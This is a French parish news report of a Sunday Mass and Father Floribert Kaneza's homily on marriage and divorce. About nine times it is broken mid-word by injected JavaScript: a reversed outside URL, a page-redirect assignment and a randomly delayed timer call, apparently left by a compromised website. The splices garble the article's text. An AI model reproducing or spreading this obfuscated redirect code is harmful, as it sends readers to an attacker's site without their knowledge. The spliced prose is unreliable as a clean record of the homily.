La sainte Messe du 3 Octobre 202, le 27e dimanche du temps ordinaire, a été célébrée avec une méditation particulière sur le mariage comme un plan de Dieu dès la création du monde. Tout au début de la messe animée par la chorale Saint Martin, le célébrant principal, Père Floribert Kaneza, Vice-recteur du Sanctuaire, a dit que les Saintes Ecritures du jour nous montrent que le mariage a été institué par Dieu de par sa volonté, comme toute chose a été faite par sa volonté.  Ainsi dans leur union, l’homme et la femme deviennent une seule chair.  Par conséquent, nous, les chrétiens, avons un travail très important de tout faire pour que cette unité entre l’homme et la femme ne soit jamais perturbée ou rompue. Le divorce n’est pas dans le plan de Dieu, et d’appeler les fidèles à demander partoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}don partout où on n’accomplit la volonté divine. Les lectures du jour étaient respectivement le Livre de la Genèse (2, 18- 24) avec comme psaume responsorial 127, l’Epitre aux Hébreux (2, 9 -11) et l’Evangile selon saint Marc (10, 2- 16).

Homélie

Père Floribert Kaneza a souligné que les Saintes Ecritures du jour nous montrent ce que Dieu dit en rapport avec le mariage.  Des problèmes entre les mariés ont toujours existé, c’est pourquoi les pharisiens en sont arrivé à tenter Jésus lui disant que Moises leur avait autorisé de renvoyer une femme avec une lettre qui lui signifie le motif de son renvoi. Le divorce est un problème qui menace de ménages, les chrétiens inclus. C’est difficile à comprendre comment les gens en arrivent à se préparer alors qu’ils ont reçu tous les enseignements nécessaires en rapport avec le mariage. « Chacun connaît au moins un couple qui a divorcé ou qui ne vit plus ensemble », a dit Père Floribert. Et les motifs souvent avancés sont l’infidélité, le matérialisme, etc. Pourtant, selon Père Floribert, l’échec du mariage est causé par le fait que les gens ne toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donnent plus une bonne place à Dieu dans leur vie de famille : voilà pourquoi les gens qui s’aiment finissent par se séparer puisqu’il n’y a pas Dieu dans leur famille.  Nous lisons dans les épitres de Saint Jean que celui qui n’aime pas n’a pas connu Dieu puisque Dieu est amour.  C’est clair que le mariage ne peut durer si Dieu n’a pas la première place en elle. C’est Dieu qui est amour, et c’est Dieu qui a voulu le mariage.  Dieu a créé tous les animaux et les a présentés devant l’homme, mais l’homme n’a pas trouvé de partenaire parmi eux. Dieu a alors toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}donné beaucoup de sommeil à l’homme, lui a retiré une côte et en a fait une femme; et l’homme s’est alors exclamé, « C’est l’os de mes os, c’est la chair de ma chair ».  Les noms mêmes ‘homme’ et ‘femme’ dénotent leur vocation depuis le début; ils toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent s’unir et vivre ensemble sans que rien ne les séparent: « Que personne ne sépare ce que Dieu a uni », a martelé le Père Floribert.

Moise a autorisé la loi qui permet le divorce à cause du durcissement des cœurs des hommes d’Israël.  D’ailleurs il n’est pas écrit qu’une femme peut renvoyer un homme avec une lettre lui signifiant la raison de son renvoi.  Moise l’a fait pour juste atoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doucir un peu la situation qui était trop dure. Jésus est venu corriger ce que le durcissement des cœurs des hommes a faussé. Cette loi rendait les femmes victimes. L’homme pouvait jeter dehors sa femme comme bon lui semblait; les femmes étaient des objets toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dont l’on pouvait disposer comme on voulait. Comme au temps de Moise, si les hommes durcissent leurs cœurs les choses vont mal dans les familles, les communautés et le pays. Pour que les choses aillent bien, il faut à tout prix revenir vers Dieu. C’est pourquoi Jésus renvoie les Pharisiens aux saintes Ecritures avec l’institution du mariage en ses débuts.

Plusieurs pays ont voté des lois autorisant la dissolution du mariage, a dit Père Floribert. Seul les Philippines n’autorisent pas le divorce sauf pour les musulmans, mais aussi suivant les textes de leur religion, peut-être puisque ses lois se basent sur le catholicisme.  Il faut alors revoir les lois qui régissent nos pays a-t-il fait remarquer. Si les familles sont fortes, les pays seront forts. Si au contraire les familles sont moins soudées à l’interne, les pays le seront moins également. Les disciples sont tentés par le fait que les Romains pouvaient divorcer comme ils voulaient.  Comprenons par-là comment Jésus se préoccupe de la vie des couples et des familles. La famille est la première chose que Dieu a bénie. C’est pourquoi Jésus est en colère avec les disciples qui repoussent les petits enfants loin de Lui pour qu’il ne les touche. Ceux-ci sont d’abord le fruit de la vie de couple, et Jésus de préciser que ceux qui iront au ciel toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent avoir le cœur d’enfant, non pas les cœurs durs comme ceux du temps de Moise. Les couples toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}doivent aussi avoir le cœur d’enfants.  Les gens qui ne bâtissent pas leur vie de couples sur Dieu, leur mariage est en danger.  C’est pourquoi il est difficile de comprendre les mots contenus dans le sacrement de mariage si on ne met pas Dieu devant. Dieu a sanctifié l’union matrimoniale, mais sur la terre il y a beaucoup de choses qui menacent le mariage. ‘Si alors les couples ne construisent toute leur vie sur Dieu, tous ces dangers dans le monde détruiront leur mariage’, a conclu le Père Floribert. Il a terminé son homélie en appelant les chrétiens à prier pour les couples, pour que les bénédictions que Dieu a toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}données au premier couple se versent sur les couples d’aujourd’hui; et que l’Eglise notre mère soit forte; ainsi tous ensemble nous marcherons dans le chemin menant au ciel. Amen !

NDAYIZEYE F.